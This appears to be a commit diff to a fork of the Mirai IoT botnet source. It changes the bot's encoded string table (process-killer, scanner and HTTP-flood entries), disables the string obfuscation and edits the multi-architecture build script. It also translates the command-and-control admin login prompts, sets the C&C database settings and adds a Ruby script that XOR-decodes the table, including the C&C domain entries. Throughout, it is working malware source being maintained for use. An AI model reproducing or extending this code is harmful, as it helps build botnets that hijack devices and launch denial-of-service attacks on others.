add_entry(TABLE_HTTP_FOUR, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x32\x2e\x30\x2e\x32\x37\x34\x33\x2e\x31\x31\x36\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 110);
add_entry(TABLE_HTTP_FIVE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61\x63\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x30\x5f\x31\x31\x5f\x36\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x36\x30\x31\x2e\x37\x2e\x37\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x56\x65\x72\x73\x69\x6f\x6e\x2f\x39\x2e\x31\x2e\x32\x20\x53\x61\x66\x61\x72\x69\x2f\x36\x30\x31\x2e\x37\x2e\x37\x00", 117);
add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);
// safe string https://youtu.be/dQw4w9WgXcQ
add_entry(TABLE_KILLER_SAFE, "\x4A\x56\x56\x52\x51\x18\x0D\x0D\x5B\x4D\x57\x56\x57\x0C\x40\x47\x0D\x46\x73\x55\x16\x55\x1B\x75\x45\x7A\x41\x73\x22", 29);
add_entry(TABLE_KILLER_PROC, "\x0D\x52\x50\x4D\x41\x0D\x22", 7);
add_entry(TABLE_KILLER_EXE, "\x0D\x47\x5A\x47\x22", 5);
add_entry(TABLE_KILLER_DELETED, "\x02\x0A\x46\x47\x4E\x47\x56\x47\x46\x0B\x22", 11);
add_entry(TABLE_KILLER_FD, "\x0D\x44\x46\x22", 4);
add_entry(TABLE_KILLER_ANIME, "\x0C\x43\x4C\x4B\x4F\x47\x22", 7);
add_entry(TABLE_KILLER_STATUS, "\x0D\x51\x56\x43\x56\x57\x51\x22", 8);
add_entry(TABLE_MEM_QBOT, "\x70\x67\x72\x6D\x70\x76\x02\x07\x51\x18\x07\x51\x22", 13);
add_entry(TABLE_MEM_QBOT2, "\x6A\x76\x76\x72\x64\x6E\x6D\x6D\x66\x22", 10);
add_entry(TABLE_MEM_QBOT3, "\x6E\x6D\x6E\x6C\x6D\x65\x76\x64\x6D\x22", 10);
add_entry(TABLE_MEM_UPX, "\x7E\x5A\x17\x1A\x7E\x5A\x16\x66\x7E\x5A\x16\x67\x7E\x5A\x16\x67\x7E\x5A\x16\x11\x7E\x5A\x17\x12\x7E\x5A\x16\x14\x7E\x5A\x10\x10\x22", 33);
add_entry(TABLE_MEM_ZOLLARD, "\x58\x4D\x4E\x4E\x43\x50\x46\x22", 8);
add_entry(TABLE_MEM_REMAITEN, "\x65\x67\x76\x6E\x6D\x61\x63\x6E\x6B\x72\x22", 11);
add_entry(TABLE_SCAN_SHELL, "\x51\x4A\x47\x4E\x4E\x22", 6);
add_entry(TABLE_SCAN_ENABLE, "\x47\x4C\x43\x40\x4E\x47\x22", 7);
add_entry(TABLE_SCAN_SYSTEM, "\x51\x5B\x51\x56\x47\x4F\x22", 7);
add_entry(TABLE_SCAN_SH, "\x51\x4A\x22", 3);
add_entry(TABLE_SCAN_QUERY, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x6F\x6B\x70\x63\x6B\x22", 19);
add_entry(TABLE_SCAN_RESP, "\x6F\x6B\x70\x63\x6B\x18\x02\x43\x52\x52\x4E\x47\x56\x02\x4C\x4D\x56\x02\x44\x4D\x57\x4C\x46\x22", 24);
add_entry(TABLE_SCAN_NCORRECT, "\x4C\x41\x4D\x50\x50\x47\x41\x56\x22", 9);
add_entry(TABLE_SCAN_PS, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x52\x51\x22", 16);
add_entry(TABLE_SCAN_KILL_9, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x49\x4B\x4E\x4E\x02\x0F\x1B\x02\x22", 22);
add_entry(TABLE_ATK_VSE, "\x76\x71\x4D\x57\x50\x41\x47\x02\x67\x4C\x45\x4B\x4C\x47\x02\x73\x57\x47\x50\x5B\x22", 21);
add_entry(TABLE_ATK_RESOLVER, "\x0D\x47\x56\x41\x0D\x50\x47\x51\x4D\x4E\x54\x0C\x41\x4D\x4C\x44\x22", 17);
add_entry(TABLE_ATK_NSERV, "\x4C\x43\x4F\x47\x51\x47\x50\x54\x47\x50\x02\x22", 12);
add_entry(TABLE_ATK_KEEP_ALIVE, "\x61\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x02\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 23);
add_entry(TABLE_ATK_ACCEPT, "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5A\x56\x0D\x4A\x56\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4A\x56\x4F\x4E\x09\x5A\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4F\x4E\x19\x53\x1F\x12\x0C\x1B\x0E\x4B\x4F\x43\x45\x47\x0D\x55\x47\x40\x52\x0E\x08\x0D\x08\x19\x53\x1F\x12\x0C\x1A\x22", 83);
add_entry(TABLE_ATK_ACCEPT_LNG, "\x63\x41\x41\x47\x52\x56\x0F\x6E\x43\x4C\x45\x57\x43\x45\x47\x18\x02\x47\x4C\x0F\x77\x71\x0E\x47\x4C\x19\x53\x1F\x12\x0C\x1A\x22", 32);
add_entry(TABLE_ATK_CONTENT_TYPE, "\x61\x4D\x4C\x56\x47\x4C\x56\x0F\x76\x5B\x52\x47\x18\x02\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x0F\x55\x55\x55\x0F\x44\x4D\x50\x4F\x0F\x57\x50\x4E\x47\x4C\x41\x4D\x46\x47\x46\x22", 48);
add_entry(TABLE_ATK_SET_COOKIE, "\x51\x47\x56\x61\x4D\x4D\x49\x4B\x47\x0A\x05\x22", 12);
add_entry(TABLE_ATK_REFRESH_HDR, "\x50\x47\x44\x50\x47\x51\x4A\x18\x22", 9);
add_entry(TABLE_ATK_LOCATION_HDR, "\x4E\x4D\x41\x43\x56\x4B\x4D\x4C\x18\x22", 10);
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x51\x47\x56\x0F\x41\x4D\x4D\x49\x4B\x47\x18\x22", 12);
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x41\x4D\x4C\x56\x47\x4C\x56\x0F\x4E\x47\x4C\x45\x56\x4A\x18\x22", 16);
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x56\x50\x43\x4C\x51\x44\x47\x50\x0F\x47\x4C\x41\x4D\x46\x4B\x4C\x45\x18\x22", 19);
add_entry(TABLE_ATK_CHUNKED, "\x41\x4A\x57\x4C\x49\x47\x46\x22", 8);
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 11);
add_entry(TABLE_ATK_CONNECTION_HDR, "\x41\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x22", 12);
add_entry(TABLE_ATK_DOSARREST, "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4D\x51\x43\x50\x50\x47\x51\x56\x22", 18);
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4E\x4D\x57\x46\x44\x4E\x43\x50\x47\x0F\x4C\x45\x4B\x4C\x5A\x22", 25);
add_entry(TABLE_HTTP_ONE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
add_entry(TABLE_HTTP_TWO, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);
add_entry(TABLE_HTTP_THREE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
add_entry(TABLE_HTTP_FOUR, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);
add_entry(TABLE_HTTP_FIVE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x6F\x43\x41\x4B\x4C\x56\x4D\x51\x4A\x19\x02\x6B\x4C\x56\x47\x4E\x02\x6F\x43\x41\x02\x6D\x71\x02\x7A\x02\x13\x12\x7D\x13\x13\x7D\x14\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x14\x12\x13\x0C\x15\x0C\x15\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x74\x47\x50\x51\x4B\x4D\x4C\x0D\x1B\x0C\x13\x0C\x10\x02\x71\x43\x44\x43\x50\x4B\x0D\x14\x12\x13\x0C\x15\x0C\x15\x22", 117);
}
void table_unlock_val(uint8_t id)
@ -86,8 +86,8 @@ void table_unlock_val(uint8_t id)
return;
}
#endif
toggle_obf(id);
//NO OBFUSCATION NEEDED. FIXED.
//toggle_obf(id);
}
void table_lock_val(uint8_t id)
@ -101,8 +101,8 @@ void table_lock_val(uint8_t id)
return;
}
#endif
toggle_obf(id);
//NO OBFUSCATION
//toggle_obf(id);
}
char *table_retrieve_val(int id, int *len)

5
mirai/build.sh
View File

@ -1,4 +1,6 @@
#!/bin/bash
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
FLAGS=""
@ -29,7 +31,6 @@ elif [ "$1" == "release" ]; then
compile_bot mipsel mirai.mpsl "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot armv4l mirai.arm "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot armv5l mirai.arm5n "$FLAGS -DKILLER_REBIND_SSH"
compile_bot armv6l mirai.arm7 "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot powerpc mirai.ppc "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot sparc mirai.spc "$FLAGS -DKILLER_REBIND_SSH -static"
compile_bot m68k mirai.m68k "$FLAGS -DKILLER_REBIND_SSH -static"
@ -40,7 +41,6 @@ elif [ "$1" == "release" ]; then
compile_bot mipsel miraint.mpsl "-static"
compile_bot armv4l miraint.arm "-static"
compile_bot armv5l miraint.arm5n " "
compile_bot armv6l miraint.arm7 "-static"
compile_bot powerpc miraint.ppc "-static"
compile_bot sparc miraint.spc "-static"
compile_bot m68k miraint.m68k "-static"
@ -51,7 +51,6 @@ elif [ "$1" == "debug" ]; then
gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.dbg
mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips
armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm
armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7
sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4
gcc -std=c99 tools/enc.c -g -o debug/enc
gcc -std=c99 tools/nogdb.c -g -o debug/nogdb

13
mirai/cnc/admin.go
View File

@ -35,7 +35,8 @@ func (this *Admin) Handle() {
// Get username
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m"))
this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m\r\n"))
this.conn.Write([]byte("\033[34;1musername\033[33;3m: \033[0m"))
username, err := this.ReadLine(false)
if err != nil {
return
@ -43,7 +44,8 @@ func (this *Admin) Handle() {
// Get password
this.conn.SetDeadline(time.Now().Add(60 * time.Second))
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m"))
this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m\r\n"))
this.conn.Write([]byte("\033[34;1mpassword\033[33;3m: \033[0m"))
password, err := this.ReadLine(true)
if err != nil {
return
@ -53,7 +55,8 @@ func (this *Admin) Handle() {
this.conn.Write([]byte("\r\n"))
spinBuf := []byte{'-', '\\', '|', '/'}
for i := 0; i < 15; i++ {
this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
//this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
this.conn.Write(append([]byte("\r\033[37;1mchecking account ... \033[31m"), spinBuf[i % len(spinBuf)]))
time.Sleep(time.Duration(300) * time.Millisecond)
}
@ -61,7 +64,9 @@ func (this *Admin) Handle() {
var userInfo AccountInfo
if loggedIn, userInfo = database.TryLogin(username, password); !loggedIn {
this.conn.Write([]byte("\r\033[32;1mпроизошла неизвестная ошибка\r\n"))
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m"))
this.conn.Write([]byte("\r\033[32;1mAn unknown error occurred\r\n"))
this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m\r\n"))
this.conn.Write([]byte("\033[31mPress any key to exit. (any key)\033[0m"))
buf := make([]byte, 1)
this.conn.Read(buf)
return

2
mirai/cnc/main.go
View File

@ -7,7 +7,7 @@ import (
"time"
)
const DatabaseAddr string = "127.0.0.1"
const DatabaseAddr string = "127.0.0.1:3306"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"

58
tools/decode_table.rb Normal file
View File

@ -0,0 +1,58 @@
hashtable = {
TABLE_CNC_DOMAIN: "\x41\x4c\x41\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
TABLE_CNC_PORT: "\x22\x35",
TABLE_SCAN_CB_DOMAIN: "\x50\x47\x52\x4d\x50\x56\x0c\x41\x4a\x43\x4c\x45\x47\x4f\x47\x0c\x41\x4d\x4f\x22",
TABLE_SCAN_CB_PORT: "\x99\xc7",
TABLE_EXEC_SUCCESS: "\x4e\x4b\x51\x56\x47\x4c\x4b\x4c\x45\x02\x56\x57\x4c\x12\x22",
TABLE_KILLER_SAFE: "\x4a\x56\x56\x52\x51\x18\x0d\x0d\x5b\x4d\x57\x56\x57\x0c\x40\x47\x0d\x46\x73\x55\x16\x55\x1b\x75\x45\x7a\x41\x73\x22",
TABLE_KILLER_PROC: "\x0d\x52\x50\x4d\x41\x0d\x22",
TABLE_KILLER_EXE: "\x0d\x47\x5a\x47\x22",
TABLE_KILLER_DELETED: "\x02\x0a\x46\x47\x4e\x47\x56\x47\x46\x0b\x22",
TABLE_KILLER_FD: "\x0d\x44\x46\x22",
TABLE_KILLER_ANIME: "\x0c\x43\x4c\x4b\x4f\x47\x22",
TABLE_KILLER_STATUS: "\x0d\x51\x56\x43\x56\x57\x51\x22",
TABLE_MEM_QBOT: "\x70\x67\x72\x6d\x70\x76\x02\x07\x51\x18\x07\x51\x22",
TABLE_MEM_QBOT2: "\x6a\x76\x76\x72\x64\x6e\x6d\x6d\x66\x22",
TABLE_MEM_QBOT3: "\x6e\x6d\x6e\x6c\x6d\x65\x76\x64\x6d\x22",
TABLE_MEM_UPX: "\x7e\x5a\x17\x1a\x7e\x5a\x16\x66\x7e\x5a\x16\x67\x7e\x5a\x16\x67\x7e\x5a\x16\x11\x7e\x5a\x17\x12\x7e\x5a\x16\x14\x7e\x5a\x10\x10\x22",
TABLE_MEM_ZOLLARD: "\x58\x4d\x4e\x4e\x43\x50\x46\x22",
TABLE_MEM_REMAITEN: "\x65\x67\x76\x6e\x6d\x61\x63\x6e\x6b\x72\x22",
TABLE_SCAN_SHELL: "\x51\x4a\x47\x4e\x4e\x22",
TABLE_SCAN_ENABLE: "\x47\x4c\x43\x40\x4e\x47\x22",
TABLE_SCAN_SYSTEM: "\x51\x5b\x51\x56\x47\x4f\x22",
TABLE_SCAN_SH: "\x51\x4a\x22",
TABLE_SCAN_QUERY: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x6f\x6b\x70\x63\x6b\x22",
TABLE_SCAN_RESP: "\x6f\x6b\x70\x63\x6b\x18\x02\x43\x52\x52\x4e\x47\x56\x02\x4c\x4d\x56\x02\x44\x4d\x57\x4c\x46\x22",
TABLE_SCAN_NCORRECT: "\x4c\x41\x4d\x50\x50\x47\x41\x56\x22",
TABLE_SCAN_PS: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x52\x51\x22",
TABLE_SCAN_KILL_9: "\x0d\x40\x4b\x4c\x0d\x40\x57\x51\x5b\x40\x4d\x5a\x02\x49\x4b\x4e\x4e\x02\x0f\x1b\x02\x22",
TABLE_ATK_VSE: "\x76\x71\x4d\x57\x50\x41\x47\x02\x67\x4c\x45\x4b\x4c\x47\x02\x73\x57\x47\x50\x5b\x22",
TABLE_ATK_RESOLVER: "\x0d\x47\x56\x41\x0d\x50\x47\x51\x4d\x4e\x54\x0c\x41\x4d\x4c\x44\x22",
TABLE_ATK_NSERV: "\x4c\x43\x4f\x47\x51\x47\x50\x54\x47\x50\x02\x22",
TABLE_ATK_KEEP_ALIVE: "\x61\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x02\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
TABLE_ATK_ACCEPT: "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5a\x56\x0d\x4a\x56\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4a\x56\x4f\x4e\x09\x5a\x4f\x4e\x0e\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x4f\x4e\x19\x53\x1f\x12\x0c\x1b\x0e\x4b\x4f\x43\x45\x47\x0d\x55\x47\x40\x52\x0e\x08\x0d\x08\x19\x53\x1f\x12\x0c\x1a\x22",
TABLE_ATK_ACCEPT_LNG: "\x63\x41\x41\x47\x52\x56\x0f\x6e\x43\x4c\x45\x57\x43\x45\x47\x18\x02\x47\x4c\x0f\x77\x71\x0e\x47\x4c\x19\x53\x1f\x12\x0c\x1a\x22",
TABLE_ATK_CONTENT_TYPE: "\x61\x4d\x4c\x56\x47\x4c\x56\x0f\x76\x5b\x52\x47\x18\x02\x43\x52\x52\x4e\x4b\x41\x43\x56\x4b\x4d\x4c\x0d\x5a\x0f\x55\x55\x55\x0f\x44\x4d\x50\x4f\x0f\x57\x50\x4e\x47\x4c\x41\x4d\x46\x47\x46\x22",
TABLE_ATK_SET_COOKIE: "\x51\x47\x56\x61\x4d\x4d\x49\x4b\x47\x0a\x05\x22",
TABLE_ATK_REFRESH_HDR: "\x50\x47\x44\x50\x47\x51\x4a\x18\x22",
TABLE_ATK_LOCATION_HDR: "\x4e\x4d\x41\x43\x56\x4b\x4d\x4c\x18\x22",
TABLE_ATK_SET_COOKIE_HDR: "\x51\x47\x56\x0f\x41\x4d\x4d\x49\x4b\x47\x18\x22",
TABLE_ATK_CONTENT_LENGTH_HDR: "\x41\x4d\x4c\x56\x47\x4c\x56\x0f\x4e\x47\x4c\x45\x56\x4a\x18\x22",
TABLE_ATK_TRANSFER_ENCODING_HDR: "\x56\x50\x43\x4c\x51\x44\x47\x50\x0f\x47\x4c\x41\x4d\x46\x4b\x4c\x45\x18\x22",
TABLE_ATK_CHUNKED: "\x41\x4a\x57\x4c\x49\x47\x46\x22",
TABLE_ATK_KEEP_ALIVE_HDR: "\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
TABLE_ATK_CONNECTION_HDR: "\x41\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x22",
TABLE_ATK_DOSARREST: "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4d\x51\x43\x50\x50\x47\x51\x56\x22",
TABLE_ATK_CLOUDFLARE_NGINX: "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4e\x4d\x57\x46\x44\x4e\x43\x50\x47\x0f\x4c\x45\x4b\x4c\x5a\x22",
TABLE_HTTP_ONE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_TWO: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_THREE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_FOUR: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
TABLE_HTTP_FIVE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x6f\x43\x41\x4b\x4c\x56\x4d\x51\x4a\x19\x02\x6b\x4c\x56\x47\x4e\x02\x6f\x43\x41\x02\x6d\x71\x02\x7a\x02\x13\x12\x7d\x13\x13\x7d\x14\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x14\x12\x13\x0c\x15\x0c\x15\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x74\x47\x50\x51\x4b\x4d\x4c\x0d\x1b\x0c\x13\x0c\x10\x02\x71\x43\x44\x43\x50\x4b\x0d\x14\x12\x13\x0c\x15\x0c\x15\x22"
}
hashtable.each { |key, value|
decode_value = []
value.each_byte { |bite| decode_value << "\\x%02x" % (bite ^ 0x22) }
puts "add_entry(#{key}, \"#{decode_value.join}\", #{value.length});"
}